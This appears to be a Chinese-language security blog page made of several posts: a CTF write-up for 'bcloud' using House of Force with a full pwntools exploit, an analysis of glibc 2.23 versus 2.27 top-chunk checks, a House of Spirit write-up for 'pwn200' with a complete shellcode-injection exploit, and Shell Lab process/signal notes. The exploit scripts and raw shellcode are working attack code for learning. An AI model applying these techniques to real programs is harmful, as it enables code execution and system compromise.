p.interactive()

完整代码：

from pwn import *

#context.log_level = "debug"

def new_note(len,content):
    p.readuntil("--->>")
    p.sendline("1")
    p.readuntil("content:")
    p.sendline(str(len))
    p.readuntil("content:")
    p.sendline(content)

def edit_note(i, data):
    p.readuntil("--->>")
    p.sendline("3")
    p.readuntil("id:\n")
    p.sendline(str(i))
    p.readuntil("content:\n")
    p.sendline(data)
    p.readuntil("success.")

def delete_note(i):
    p.readuntil("--->>")
    p.sendline("4")
    p.readuntil("id:\n")
    p.sendline(str(i))

p = process("./bcloud")
elf = ELF("./bcloud")
libc = ELF("./libc-2.23.so")

p.readuntil("name:\n")
p.send("a"*0x40)
p.read(0x44)
heap = u32(p.read(4))
success("heap >> "+hex(heap))

#gdb.attach(p)

p.readuntil("Org:")
p.send("a"*0x40)
p.readuntil("Host:")
p.sendline(p32(0xffffffff))
p.readuntil("Enjoy:")

note_list = 0x804B120
top_chunk_addr = heap + 0xD8
offset = note_list - (top_chunk_addr + 0x8) - 24
new_note(0x10, "kkk")

new_note(offset,'')
payload = p32(elf.got["free"])
payload += p32(elf.got["atoi"])
payload += p32(elf.got["atoi"])
new_note(0x100, payload)

edit_note(0, p32(elf.symbols["printf"]+6))
delete_note(1)
atoi_libc = u32(p.read(4))
p.readuntil("success.")
libc_base = atoi_libc - libc.symbols["atoi"]
print("libc_base >> " + hex(libc_base))

system = libc.symbols["system"] + libc_base
edit_note(2, p32(system))

p.sendline("/bin/sh")
p.interactive()

house of force 小结（2.23-32位）

house of force 的核心在于：

溢出字节覆盖 top chunk 的 size 位
计算偏移，把 top chunk 分割到可以修改的目标地址

特点归纳如下：

需要可以控制的修改模块
需要可以输入任意大小的申请模块（包括负数）
需要堆溢出（覆盖“topchunk->size”）
不需要释放模块

修改“topchunk->size”和“计算目标偏移”就是这种攻击的关键，通常用堆溢出的方式来修改“topchunk->size”，而以下公式可以用来计算偏移

1
2
3

offset = target_addr - (top_chunk_addr + 0x8) # 64位就改为"+0x10"
# target_addr：目标地址
# top_chunk_addr：top chunk起始地址

PS：次题目在 2.27 版本无法打通，GDB调试后发现 “0xffffffff” 并没有被 strcpy 复制

2.23 版本：

pwndbg> telescope 0x8aec000
00:0000│  0x8aec000 ◂— 0x0
01:0004│  0x8aec004 ◂— 0x49 /* 'I' */
02:0008│  0x8aec008 ◂— 0x61616161 ('aaaa')
... ↓     5 skipped
pwndbg> 
08:0020│  0x8aec020 ◂— 0x61616161 ('aaaa')
... ↓     7 skipped
pwndbg> 
10:0040│  0x8aec040 ◂— 0x61616161 ('aaaa')
11:0044│  0x8aec044 ◂— 0x61616161 ('aaaa')
12:0048│  0x8aec048 —▸ 0x8aec008 ◂— 0x61616161 ('aaaa')
13:004c│  0x8aec04c ◂— 0x49 /* 'I' */
14:0050│  0x8aec050 ◂— 0xffffffff
15:0054│  0x8aec054 ◂— 0x0

2.27 版本：

pwndbg> telescope 0x9b19158
00:0000│  0x9b19158 ◂— 0x0
01:0004│  0x9b1915c ◂— 0x51 /* 'Q' */
02:0008│  0x9b19160 ◂— 0x61616161 ('aaaa')
... ↓     5 skipped
pwndbg> 
08:0020│  0x9b19178 ◂— 0x61616161 ('aaaa')
... ↓     7 skipped
pwndbg> 
10:0040│  0x9b19198 ◂— 0x61616161 ('aaaa')
11:0044│  0x9b1919c ◂— 0x61616161 ('aaaa')
12:0048│  0x9b191a0 —▸ 0x9b19160 ◂— 0x61616161 ('aaaa')
13:004c│  0x9b191a4 ◂— 0x0
14:0050│  0x9b191a8 ◂— 0x0
15:0054│  0x9b191ac ◂— 0x51 /* 'Q' */
16:0058│  0x9b191b0 ◂— 0xffffffff

发现程序的对齐方式变了：

2.23 版本：8字节对齐（0x8）
2.27 版本：16字节对齐（0x10）

导致“org[64]”到了“0x9b191a4”才结束，“host[68]”和“org[64]”之间有“\x00”，所以复制失败

House Of Force-原理

Posted on 2022-03-04 Edited on 2022-03-05 In HouseOfSeries 6.4k 6 mins.

House Of Force

house of force 是修改 top chunk size 的一种利用方法

利用 top chunk 分割中的漏洞来申请任意 chunk，再通过修改模块进行 GOT劫持，hook劫持

House Of Force 利用姿势

该利用姿势是由于libc的堆管理在 malloc 的时候默认 top chunk 的 size 是正确合法的，所以不会去检查 top chunk 的 size 值，这就导致了一种情况，当一个程序存在可以修改 top chunk size 的漏洞时，我们把 top chunk 的 size 修改成 0xffffffff(x86)

假设这个时候的 top_chunk=0x601200，然后 malloc(0xffe00020)，然后对 malloc 申请的 size 进行检查，0xffe00030 < top_chunk_size ，所以可以成功malloc内存，然后计算top_chunk的新地址：0xffe00030+0x601200=0x100401230, 因为是x86环境，最高位溢出了，所以top_chunk=0x401230

然后下次我们再malloc的时候，返回的地址就是0x401238

Top chunk的分割机制与利用点

top chunk的作用是作为后备堆空间，在各bin中没有chunk可提供时，分割出一个chunk提供给用户

简化版本的分割操作：（为了方便看懂，进行了修改）

victim = av->top; /* 获取addr of top chunk */
size   = chunksize(victim); /* 获取top chunk size */
if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) 
{
    remainder_size = size - nb; /* 计算剩下的size */
    remainder      = chunk_at_offset(victim, nb); 
    av->top        = remainder; /* 修改top chunk */
    set_head(victim, nb | PREV_INUSE |
            (av != &main_arena ? NON_MAIN_ARENA : 0)); /* 设置top chunk的头 */
    set_head(remainder, remainder_size | PREV_INUSE); /* 设置剩下chunk的头 */

    check_malloced_chunk(av, victim, nb);
    void *p = chunk2mem(victim);
    alloc_perturb(p, bytes);
    return p;
}

首先是libc会检查用户申请的大小，top chunk是否能给的起，如果给得起，就由 top chunk 的 head 处，以用户申请大小所匹配的 chunk 大小为偏移量，将 top chunk 的位置“推”到新的位置，而原来的 top chunk head 处就作为新的堆块被分配给用户了

如果我们能控制用户申请的大小为任意值，我们就能将 top chunk 劫持到任意内存地址，然后就可以控制目标内存

1	if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))

保护检查：只有 top chunk 的 size 大于等于申请的 size，才会有后续操作，而 pwn 中劫持内存常常劫持的是malloc_hook、got表等指针，与堆空间中的 top chunk 相距甚远，远到所需要申请的size必定超出top chunk 现有的大小

破解办法：大小检查时用的数据类型是 unsigned long，如果能通过某些漏洞（比如溢出）将 top chunk 的 size 字段篡改成 -1，那么在做这个检查时，size 就变成了无符号整数中最大的值，这样一来，不管用户申请多大的堆空间都可以满足条件

// 此外，虽然此处的检查中，用户申请的大小也被当做无符号整型对待，但是在后面推 top chunk 的时候是作为 int 对待的，因此如果劫持目标内存地址比 top chunk 低，我们申请负数大小的内存是可以劫持过去的

利用条件：

用户能够篡改 top chunk 的 size 字段（篡改为负数或很大值）
用户可以申请任意大小的堆内存（包括负数）

版本对 House Of Force 的影响

libc-2.23

  /* Try to use top chunk */
  /* Require that there be a remainder, ensuring top always exists  */
  if ( (remainder_size = chunksize(top(ar_ptr)) - nb) < (long)MINSIZE)
  {

#if HAVE_MMAP
    /* If the request is big and there are not yet too many regions,
       and we would otherwise need to extend, try to use mmap instead.  */
    if ((unsigned long)nb >= (unsigned long)mmap_threshold &&
        n_mmaps < n_mmaps_max &&
        (victim = mmap_chunk(nb)) != 0)
      return victim;
      /* 如果申请字节超过“topchunk->size”,调用mmap_chunk */
#endif

    /* Try to extend */
    malloc_extend_top(ar_ptr, nb);
    if ((remainder_size = chunksize(top(ar_ptr)) - nb) < (long)MINSIZE)
    {
#if HAVE_MMAP
      /* A last attempt: when we are out of address space in a
         non-main arena, try mmap anyway, as long as it is allowed at
         all.  */
      if (ar_ptr != &main_arena &&
          n_mmaps_max > 0 &&
          (victim = mmap_chunk(nb)) != 0)
        return victim;
        /* 如果,第一次调用mmap_chunk没有成功,则再调用一次 */
#endif
      return 0; /* propagate failure */
    }
  }
  victim = top(ar_ptr);
  set_head(victim, nb | PREV_INUSE); /* 设置top chunk的头 */
  top(ar_ptr) = chunk_at_offset(victim, nb);
  set_head(top(ar_ptr), remainder_size | PREV_INUSE); /* 设置剩下chunk的头 */
  check_malloced_chunk(ar_ptr, victim, nb); /* 这个检查几乎没有影响 */
  return victim;

和给出的例子几乎一样，通过“topchunk->size”判断是否调用“mmap_chunk”

完全可以打 House Of Force

libc-2.27

if (av != &main_arena)
    {
      heap_info *old_heap, *heap;
      size_t old_heap_size;

      /* First try to extend the current heap. */
      old_heap = heap_for_ptr (old_top);
      old_heap_size = old_heap->size;
      if ((long) (MINSIZE + nb - old_size) > 0 
          /* top chunk不够用，grow_heap扩展top chunk的空间 */
          /* 要打House Of Force,这个if一定不成立(old_size非常大) */
          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
        {
          av->system_mem += old_heap->size - old_heap_size;
          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
                    | PREV_INUSE);
        }
      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
        { 
          /* Use a newly allocated heap.  */
          heap->ar_ptr = av;
          heap->prev = old_heap;
          av->system_mem += heap->size;
          /* Set up the new top.  */
          top (av) = chunk_at_offset (heap, sizeof (*heap));
          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);

          /* Setup fencepost and free the old top chunk with a multiple of
             MALLOC_ALIGNMENT in size. */
          /* The fencepost takes at least MINSIZE bytes, because it might
             become the top chunk again later.  Note that a footer is set
             up, too, although the chunk is marked in use. */
          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
          if (old_size >= MINSIZE) /* 需要分割 */
            {
              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
              _int_free (av, old_top, 1);
            }
          else /* 不需要分割 */
            {
              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
              set_foot (old_top, (old_size + 2 * SIZE_SZ));
            }
        }
      else if (!tried_mmap)
        /* We can at least try to use to mmap memory.  */
        goto try_mmap;
    }
................

这里只展示了“av != &main_arena”，不是 House Of Force 的重点，而“av == &main_arena”太长不方便展示，给出部分代码方便查源码时定位

程序复杂了不少，也多了许多检查：

1 2	/* top chunk is OK */ check_chunk (av, av->top);

1	# define check_chunk(A, P) do_check_chunk (A, P)

1
2
3

/* Memory allocated from the system in this arena.  */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;

static void
do_check_chunk (mstate av, mchunkptr p)
{
  unsigned long sz = chunksize (p);
  /* min and max possible addresses assuming contiguous allocation */
  char *max_address = (char *) (av->top) + chunksize (av->top);
  char *min_address = max_address - av->system_mem;
    /* 这里就是问题的关键 */
    /* 因为“topchunk->size”被设置得非常大，所以max_address和min_address也非常大 */
    /* 这个设置范围的操作打死了House Of Force */
    
  if (!chunk_is_mmapped (p)) 
    {
      /* Has legal address ... */
      if (p != av->top)
        {
          if (contiguous (av))
            {
              assert (((char *) p) >= min_address);
              /* 因为min_address非常大，重新申请的chunk地址不可能大于它 */
              assert (((char *) p + sz) <= ((char *) (av->top)));
            }
        }
      else 
        {
          /* top size is always at least MINSIZE */
          assert ((unsigned long) (sz) >= MINSIZE);
          /* top predecessor always marked inuse */
          assert (prev_inuse (p));
        }
    }
  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
    {
      /* address is outside main heap  */
      if (contiguous (av) && av->top != initial_top (av))
        {
          assert (((char *) p) < min_address || ((char *) p) >= max_address);
        }
      /* chunk is page-aligned */
      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
      /* mem is aligned */
      assert (aligned_OK (chunk2mem (p)));
    }
}

在检查中给chunk添加了一个“范围”（min_address & max_address），想要打 House Of Force ，就需要把“topchunk->size”设置得很大，这就导致了这个“范围”十分极端，不可能成立

所以不能打 House Of Force

总而言之：House Of Force 只能在 libc-2.23 中生效，因为 libc-2.23 会在检查了“topchunk->size”后就进行分割，可以直接利用，而 libc-2.27 设置了一个“范围”，限制了申请chunk的地址范围，这样就导致 top chunk 无法分割到目标地址了

House Of Spirit-2.31-64

Posted on 2022-03-03 Edited on 2022-03-05 In Pwn train 8.7k 8 mins.

pwn200

➜  [/home/ywhkkx/桌面] ./pwn200 
who are u?
ywhkkx
ywhkkx, welcome to ISCC~ 
give me your id ~~?
13
give me money~
200

=======EASY HOTEL========
1. check in
2. check out
3. goodbye
your choice :

pwn200: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5a7b9f542c0bf79112b5be3f0198d706cce1bcad, stripped

[*] '/home/ywhkkx/桌面/pwn200'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

64位，全关

void pwn()
{
  __int64 i; // [rsp+10h] [rbp-40h]
  char v1[48]; // [rsp+20h] [rbp-30h] BYREF

  puts("who are u?");
  for ( i = 0LL; i <= 47; ++i )
  {
    read(0, &v1[i], 1uLL);
    if ( v1[i] == 10 )                       
    {
      v1[i] = 0;
      break;
    }
  }
  printf("%s, welcome to ISCC~ \n", v1);
  puts("give me your id ~~?");
  getNum();
  pwn2();
}

void pwn2()
{
  char buf[56]; // [rsp+0h] [rbp-40h] BYREF
  char *dest; // [rsp+38h] [rbp-8h]

  dest = (char *)malloc(0x40uLL);
  puts("give me money~");
  read(0, buf, 0x40uLL);
  strcpy(dest, buf);                            // overflow
  ptr = dest;
  hotel();
}

存在栈溢出，buf 越界覆盖了 dest

void hotel()
{
  int Num; // eax

  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      Num = getNum();
      if ( Num != 2 )
        break;
      checkOut();                               // free ptr
    }
    if ( Num == 3 )
      break;
    if ( Num == 1 )
      checkIn();                                // malloc ptr
    else
      puts("invalid choice");
  }
  puts("good bye~");
}

标准的堆模板

void checkOut()
{
  if ( ptr )
  {
    puts("out~");
    free(ptr);
    ptr = 0LL;
  }
  else
  {
    puts("havn't check in");                    // 基础保护
  }
}

free 有一个基础检查，置空了指针

void checkIn()
{
  int size; // [rsp+Ch] [rbp-4h]

  if ( ptr )
  {
    puts("already check in");
  }
  else
  {
    puts("how long?");
    size = getNum();
    if ( size <= 0 || size > 0x80 )
    {
      puts("invalid length");
    }
    else
    {
      ptr = malloc(size);
      printf("give me more money : ");
      printf("\n%d\n", (unsigned int)size);
      read(0, ptr, (unsigned int)size);
      puts("in~");
    }
  }
}

入侵思路

没有开NX，很明显是为了打 shellcode 注入

for ( i = 0LL; i <= 47; ++i )
{
  read(0, &v1[i], 1uLL);
  if ( v1[i] == 10 )                          // leak rbp
  {
    v1[i] = 0;
    break;
  }
}

这里有个很明显的漏洞：read 需要检查到“\n”才会写入“\x00”，如果 48 次循环后没有输入“\n”，就会造成 leak，先在GDB中看看是哪个数据“leak”了：（在IDA中看就是rbp）

pwndbg> search -s aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
warning: Unable to access 16000 bytes of target memory at 0x7ffff7bd2d1f, halting search.
[stack]         0x7fffffffb680 0x6161616161616161 ('aaaaaaaa')
[stack]         0x7fffffffdd40 0x6161616161616161 ('aaaaaaaa')
pwndbg> x/20xg 0x7fffffffb680
0x7fffffffb680:	0x6161616161616161	0x6161616161616161
0x7fffffffb690:	0x6161616161616161	0x6161616161616161
0x7fffffffb6a0:	0x6161616161616161	0x6161616161616161
0x7fffffffb6b0:	0x202c7fffffffdd90	0x20656d6f636c6577 
0x7fffffffb6c0:	0x7e43435349206f74	0x0000000000000a20
0x7fffffffb6d0:	0x0000000000000000	0x0000000000000000
0x7fffffffb6e0:	0x0000000000000000	0x0000000000000000

泄露了 rbp 的地址，我们就可以把 shellcode 放在栈中，用 rbp 来计算 shellcode 的地址

shellcode = asm(shellcraft.amd64.linux.sh(), arch = 'amd64')

payload  = b''
payload += shellcode.ljust(48)
 
p.recvuntil('who are u?\n')
p.send(payload)
p.recvuntil(payload)
 
rbp_addr = u64(p.recvn(6).ljust(8, b'\x00'))
success('rbp_addr >> '+hex(rbp_addr))
shellcode_addr = rbp_addr - 0x50 
success("shellcode_addr: "+hex(shellcode_addr))

fake_addr = rbp_addr - 0x90 # offset 0x40 to shellcode, 0x400a29 return address
success("fake_addr: "+hex(fake_addr))

首先我们是可以控制 free 的：（通过 buf 溢出到 *dest）

1 2	char buf[56]; // [rsp+0h] [rbp-40h] BYREF char *dest; // [rsp+38h] [rbp-8h]

那么就可以利用 House Of Spirit 进行 WAA，但是选择 free 哪个地址呢？

在 GDB 中，把 rbp_addr 向上打印，并标记出可以控制的区域（还要留心“数字”）

pwndbg> telescope 0x7fffc43095b0-0x100 // rbp_addr-0x100
00:0000│     0x7fffc43094b0 —▸ 0x400cb7 ◂— imul   esi, dword ptr [esi + 0x65], 0x20656d20 /* 'give me money~' */
01:0008│     0x7fffc43094b8 —▸ 0x7f48002ecbd2 (puts+418) ◂— cmp    eax, -1
02:0010│     0x7fffc43094c0 ◂— 0x50000 
03:0018│     0x7fffc43094c8 ◂— 0x0
04:0020│     0x7fffc43094d0 —▸ 0x7fffc4309530 —▸ 0x7fffc4309590 —▸ 0x7fffc43095b0 —▸ 0x400b60 ◂— ...
05:0028│     0x7fffc43094d8 —▸ 0x4006b0 ◂— xor    ebp, ebp
06:0030│     0x7fffc43094e0 —▸ 0x7fffc4309690 ◂— 0x1
07:0038│ rsp 0x7fffc43094e8 —▸ 0x400a64 ◂— lea    rdx, [rbp - 0x40]
pwndbg> 
08:0040│ rsi 0x7fffc43094f0 —▸ 0x7fffc4309690 ◂— 0x1 // 可控:0x40
09:0048│     0x7fffc43094f8 ◂— 0x0
0a:0050│     0x7fffc4309500 ◂— 0x0
0b:0058│     0x7fffc4309508 —▸ 0x7f48002ac740 (atoi+16) ◂— add    rsp, 8
0c:0060│     0x7fffc4309510 ◂— 9 /* '\t' */
0d:0068│     0x7fffc4309518 —▸ 0x4008b5 ◂— leave  
0e:0070│     0x7fffc4309520 —▸ 0x7fffc4003233 ◂— 0x0 // fake_addr
0f:0078│     0x7fffc4309528 —▸ 0x1b67260 ◂— 0x0
pwndbg> 
10:0080│ rbp 0x7fffc4309530 —▸ 0x7fffc4309590 —▸ 0x7fffc43095b0 —▸ 0x400b60 ◂— push   r15 // 可控区域结束
11:0088│     0x7fffc4309538 —▸ 0x400b34 ◂— leave // target
12:0090│     0x7fffc4309540 —▸ 0x7f48006542a0 (_IO_file_jumps) ◂— 0x0
13:0098│     0x7fffc4309548 —▸ 0x7f48002f68c9 (_IO_file_setbuf+9) ◂— test   rax, rax
14:00a0│     0x7fffc4309550 ◂— 0x30 /* '0' */
15:00a8│     0x7fffc4309558 ◂— 0x20 /* ' ' */
16:00b0│     0x7fffc4309560 ◂— 0x91969dd1bb48c031 // shellcode_addr
17:00b8│     0x7fffc4309568 ◂— 0x53dbf748ff978cd0

现在的目的是：利用 WAA 把“shellcode_addr”写入某个函数的返回地址

这里选择写入“0x7fffc4309538”（pwn2的返回地址），下面说明原因：

1	11:0088│ 0x7fffc4309538 —▸ 0x400b34 ◂— leave // target

08:0040│ rsi 0x7fffc43094f0 —▸ 0x7fffc4309690 ◂— 0x1 // 可控:0x40
    ............
10:0080│ rbp 0x7fffc4309530 —▸ 0x7fffc4309590 —▸ 0x7fffc43095b0 —▸ 0x400b60 ◂— push   r15 // 可控区域结束
    ............
14:00a0│     0x7fffc4309550 ◂— 0x30 /* '0' */
15:00a8│     0x7fffc4309558 ◂— 0x20 /* ' ' */

House Of Spirit 需要写入“chunk->size”和“nextchunk->size”，在发现数字“0x30”和“0x20”后，发现它距离“可控区域”不远，所以选择离他们最近的返回地址“0x7fffc4309538”作为目标地址（并且这个地址在“可控区域”以外，不用担心它被覆写）

因为最后要写入“0x7fffc4309538”，所以必须 free 这之前的地址，这样申请回来的时候就可以向下控制，这里选择“0x7fffc4003233”

1	0e:0070│ 0x7fffc4309520 —▸ 0x7fffc4003233 ◂— 0x0 // fake_addr

对写入的数据进行构思，使“chunk->size”和“nextchunk->size”可以接上：

data = p64(0) * 4 + p64(0) + p64(0x41)        # no strcpy
data = data.ljust(56, b'\x00') + p64(fake_addr)
print(data)
p.send(data)

pwndbg> stack 50
00:0000│ rsi rsp 0x7fffc43094f0 ◂— 0x0 // 从这里开始的区域都是可以控制的
... ↓            4 skipped
05:0028│         0x7fffc4309518 ◂— 0x41 // chunk->size
06:0030│ rax rdi 0x7fffc4309520 ◂— 0x0 // fake_addr
07:0038│         0x7fffc4309528 —▸ 0x7fffc4309520 ◂— 0x0
08:0040│ rbp     0x7fffc4309530 —▸ 0x7fffc4309590 —▸ 0x7fffc43095b0 —▸ 0x400b60 ◂— push   r15
09:0048│         0x7fffc4309538 —▸ 0x400b34 ◂— leave // target 
0a:0050│         0x7fffc4309540 —▸ 0x7f48006542a0 (_IO_file_jumps) ◂— 0x0
0b:0058│         0x7fffc4309548 —▸ 0x7f48002f68c9 (_IO_file_setbuf+9) ◂— test   rax, rax
0c:0060│         0x7fffc4309550 ◂— 0x30 
0d:0068│         0x7fffc4309558 ◂— 0x20 // nextchunk->size

1 2	In [4]: hex(0x7fffc4309518+0x40) Out[4]: '0x7fffc4309558' // chunk->size和nextchunk->size接上了

释放掉这个假chunk，再申请回来，就可以控制目标地址了（0x7fffc4309538）

p.recvuntil('choice : ')
p.sendline('2')     # free(fake_addr)

p.recvuntil('choice : ')
p.sendline('1')     # malloc(fake_addr) 
p.recvuntil('long?')
p.sendline('48')

data = b'a' * 0x18 + p64(shellcode_addr) # write to target_addr
data = data.ljust(48, b'\x00')
p.send(data)

pwndbg> telescope 0x7fffc4309520
00:0000│  0x7fffc4309520 ◂— 0x6161616161616161 ('aaaaaaaa')
... ↓     2 skipped
03:0018│  0x7fffc4309538 —▸ 0x7fffc4309560 ◂— 0x91969dd1bb48c031 // target
04:0020│  0x7fffc4309540 ◂— 0x0
05:0028│  0x7fffc4309548 ◂— 0x0
06:0030│  0x7fffc4309550 ◂— 0x30 /* '0' */
07:0038│  0x7fffc4309558 ◂— 0x20 /* ' ' */

完整代码：

from pwn import *
 
context.log_level = 'debug'
# p = remote('127.0.0.1', 7777)
p = process('./pwn200')
 
free_got = 0x0000000000602018
 
shellcode = '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'

payload  = b''
payload += shellcode.ljust(48)
 
p.recvuntil('who are u?\n')
p.send(payload)
p.recvuntil(payload)
 
rbp_addr = u64(p.recvn(6).ljust(8, b'\x00'))
success('rbp_addr >> '+hex(rbp_addr))
shellcode_addr = rbp_addr - 0x50 
success("shellcode_addr: "+hex(shellcode_addr))

fake_addr = rbp_addr - 0x90 
success("fake_addr: "+hex(fake_addr))
 
 
p.recvuntil('give me your id ~~?\n')
p.sendline('32') 
p.recvuntil('give me money~\n')

data = p64(0) * 4 + p64(0) + p64(0x41)        
data = data.ljust(56, b'\x00') + p64(fake_addr)
p.send(data)

p.recvuntil('choice : ')
p.sendline('2')     
p.recvuntil('choice : ')
p.sendline('1')    
p.recvuntil('long?')
p.sendline('48')    

data = b'a' * 0x18 + p64(shellcode_addr)
data = data.ljust(48, b'\x00')
p.send(data)
 
p.recvuntil('choice')
p.sendline('3')

p.interactive()

house of spirit 小结（2.27~2.31-64位）

当考虑使用 house of spirit 时，一定要多多关注“可控区域”里的“数字”（有时候会利用“计数器”来构造“数字”）

利用这些“数字”充当“chunk->size”或者“nextchunk->size”，并调节“size”的大小使其可以连接起来，这样一般就可以通过 free 的检查了

注意：GDB中的“bins”指令看不见 free 掉的 fake_chunk，GDB也不会在 fastbin 中显示 fake_chunk，但是实际上是可以直接申请 fake_chunk 的

CSapp-Shell Lab

Posted on 2022-03-02 Edited on 2022-10-10 In Knowledge 50k 45 mins.

Shell Lab

本实验的目的是让学生更加熟悉过程控制和信号的概念，您可以通过编写一个简单的Unix shell程序来实现这一点，该程序支持作业控制

实验文件

tsh.c：实验主体文件，代码写在这里
tshref.out：包含参考shell程序的所有测试数据的输出结果
tshref：示例程序

开始实验前需要补充一些知识（可以一边看函数，一边学习这些知识）

进程 & 线程 & 任务

进程

进程是指一个具有 独立功能 的程序在 某个数据集合上 的一次动态执行过程，它是操作系统进行资源分配和调度的基本单元

一次任务的运行可以发多个进程，这些进程相互合作来完成该任务的一个最终目标

每个进程都拥有自己的数据段，代码段和堆栈段，这就造成了进程在进行切换时操作系统的开销比较大，为了提高效率，操作系统又引入了另一个概念——线程

线程

线程是进程上下文中执行的代码序列，又称为轻量级的进程，它是操作系统能够调度的最小单元

线程可以对进程的内存空间和资源进行访问，并与同一进程中的其他线程共享，因此，线程的上下文切换的开销比进程小得多

一个进程可以拥有多个线程，其中每个线程共享该进程所拥有的资源，要注意的是，由于线程共享了进程的资源和地址空间，因此，任何线程对系统资源的操作都会给其他线程带来影响，由此可知，多线程中的同步是非常重要的问题

任务

任务是一个逻辑概念，指由一个软件完成的活动，或者是为实现某个目的的一系列操作

通常一个任务是一个程序的一次运行，一个任务包含一个或多个完成独立功能的子任务，这个独立的子任务是进程或者是线程

参考：操作系统中任务、进程和线程总结

进程控制

进程控制的主要功能是对系统中的所有进程实施有效的管理，它具有创建新进程、撤销已有进程、实现进程状态转换等功能

在操作系统中，一般把进程控制用的程序段称为原语，原语的特点是执行期间不允许中断，它是一个不可分割的基本单位

在三态模型中，进程状态分为三个基本状态，即运行态，就绪态，阻塞态

在五态模型中，进程分为新建态，终止态，运行态，就绪态，阻塞态

下面是实现进程控制的部分函数：

1 2	pid_t getpid(void); pid_t getppid(void);

getpid 函数返回调用进程的 PID

getppid 函数返回它的父进程的 PID

1	void exit(int status);

exit 函数以 status 退出状态来终止进程

1	pid_t fork(void);

父进程通过调用 fork 函数创建一个新的运行的子进程

// 新创建的子进程几乎但不完全与父进程相同

fork 函数是有趣的（也常常令人迷惑），因为它只被调用一次，却会返回两次：一次是在调用进程（父进程）中，一次是在新创建的子进程中，在父进程中，fork 返回子进程的 PID，在子进程中，fork 返回 0，因为子进程的 PID 总是为非零，返回值就提供一个明确的方法来分辨程序是在父进程还是在子进程中执行

1	pid_t waitpid(pid_t pid, int *statusp, int options);

一个进程可以通过调用 waitpid 函数来等待它的子进程终止或者停止

默认情况下（当 options=0 时），waitpid 挂起调用进程的执行，直到它的 等待集合（wait set）中的一个子进程终止。
如果等待集合中的一个进程在刚调用的时刻就已经终止了，那么 waitpid 就立即返回

在这两种情况中，waitpid 返回导致 waitpid 返回的已终止子进程的 PID，此时，已终止的子进程已经被回收，内核会从系统中删除掉它的所有痕迹

1	unsigned int sleep(unsigned int secs);

sleep 函数将一个进程挂起一段指定的时间

1	int pause(void);

pause 函数让调用函数休眠，直到该进程收到一个信号

1 2	int execve(const char filename, const char argv[], const char *envp[]);

execve 函数在当前进程的上下文中加载并运行一个新程序

1
2
3

char *getenv(const char *name);
int setenv(const char *name, const char *newvalue, int overwrite);
void unsetenv(const char *name);

getenv 函数在环境数组中搜索字符串 “name=value”，如果找到了，它就返回一个指向 value 的指针，否则它就返回 NULL

如果环境数组包含一个形如 “name=oldva1ue” 的字符串，那么 unsetenv 会删除它，而 setenv 会用 newvalue 代替 oldvalue，但是只有在 overwirte 非零时才会这样，如果 name 不存在，那么 setenv 就把 “name=newvalue” 添加到数组中

1	int setpgid(pid_t pid, pid_t pgid);

将参数 pid 指定进程所属的组识别码设为参数 pgid 指定的组识别码

如果参数pid 为 0，则会用来设置目前进程的组识别码
如果参数pgid 为 0，则会以目前进程的进程识别码来取代

信号集函数

我们已经知道，我们可以通过信号来终止进程，也可以通过信号来在进程间进行通信，程序也可以通过指定信号的关联处理函数来改变信号的默认处理方式，也可以屏蔽某些信号，使其不能传递给进程

SIGINT：程序终止(interrupt)信号，在用户键入INTR字符(通常是Ctrl-C)时发出，用于通知前台进程组终止进程
SIGQUIT：和SIGINT类似，但由QUIT字符(通常是Ctrl-)来控制，进程在因收到SIGQUIT退出时会产生core文件, 在这个意义上类似于一个程序错误信号
SIGTERM：程序结束(terminate)信号，与SIGKILL不同的是该信号可以被阻塞和处理，通常用来要求程序自己正常退出，shell命令kill缺省产生这个信号（如果进程终止不了，我们才会尝试SIGKILL）
SIGSTOP：停止(stopped)进程的执行，注意它和terminate以及interrupt的区别，该进程还未结束，只是暂停执行，本信号不能被阻塞，处理或忽略
SIGCHLD：告知父进程回收自己，但该信号的默认处理动作为忽略，因此父进程仍然不会去回收子进程，需要捕捉处理实现子进程的回收
SIGTSTP：停止进程的运行，但该信号可以被处理和忽略，用户键入SUSP字符时(通常是Ctrl-Z)发出这个信号

那么我们应该如何设定我们需要处理的信号，我们不需要处理哪些信号等问题呢？信号集函数就是帮助我们解决这些问题的，下面是信号函数集：

1	int sigfillset(sigset_t * set); /* 填充 */

sigfillset 用来将参数 set 信号集初始化，然后把所有的信号加入到此信号集里

1	int sigemptyset(sigset_t set); / 清空 */

该函数的作用是将信号集初始化为空

1	int sigaddset(sigset_t set, int signo); / 添加 */

该函数的作用是把信号 signo 添加到信号集 set 中，成功时返回 0，失败时返回 -1

1	int sigdelset(sigset_t set, int signo); / 删除 */

该函数的作用是把信号 signo 从信号集 set 中删除，成功时返回 0，失败时返回 -1

1	int sigismember(sigset_t set, int signo); / 是否是成员 */

判断给定的信号 signo 是否是信号集中的一个成员，如果是返回 1，如果不是，返回 0，如果给定的信号无效，返回 -1

1	int sigprocmask( int how, const sigset_t restrict set, sigset_t restrict oset );

检测或更改其信号屏蔽字

